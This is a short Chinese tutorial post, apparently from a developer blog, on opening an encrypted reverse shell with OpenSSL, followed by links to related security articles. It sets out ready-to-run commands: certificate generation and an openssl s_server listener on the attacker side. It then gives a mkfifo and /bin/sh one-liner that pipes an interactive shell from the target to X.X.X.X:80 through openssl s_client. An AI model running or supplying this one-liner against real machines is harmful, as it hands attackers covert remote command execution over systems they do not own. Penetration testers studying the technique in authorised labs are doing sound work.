使用OpenSSL的反弹shell

1、攻击机生成证书:

powershell 复制代码
 openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

2、攻击机开启服务

powershell 复制代码
openssl s_server -quiet -key key.pem -cert cert.pem -port 80

3、靶机连接命令

powershell 复制代码
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect X.X.X.X:80 > /tmp/s; rm /tmp/s

4、实现效果

攻击机可进行命令执行

靶机交出控制权

其他反弹shell命令

参见我的其他文章

相关推荐
周某人姓周3 小时前
搭建渗透测试环境
网络安全·网络攻击模型
码农12138号9 小时前
BUUCTF在线评测-练习场-WebCTF习题[GYCTF2020]Blacklist1-flag获取、解析
web安全·网络安全·ctf·sql注入·handler·buuctf
爱思德学术11 小时前
CCF发布《计算领域高质量科技期刊分级目录(2025年版)》
大数据·网络安全·自动化·软件工程
小红卒21 小时前
upload-labs靶场通关详解:第21关 数组绕过
web安全·网络安全·文件上传漏洞
kp000001 天前
GitHub信息收集
web安全·网络安全·信息收集
LuDvei1 天前
CH9121T电路及配置详解
服务器·嵌入式硬件·物联网·网络协议·tcp/ip·网络安全·信号处理
山川绿水1 天前
Ubuntu22.04更新Openssh至9.9p2无法正常连接,报错解决
服务器·web安全·网络安全
武汉唯众智创2 天前
网络安全实训室建设方案全攻略
网络·安全·web安全·网络安全·网络安全实训室·网络安全实验室
宝山哥哥2 天前
网络信息安全学习笔记1----------网络信息安全概述
网络·笔记·学习·安全·网络安全
在安全厂商修设备2 天前
SQL注入与防御-第六章-3:利用操作系统--巩固访问
sql·web安全·网络安全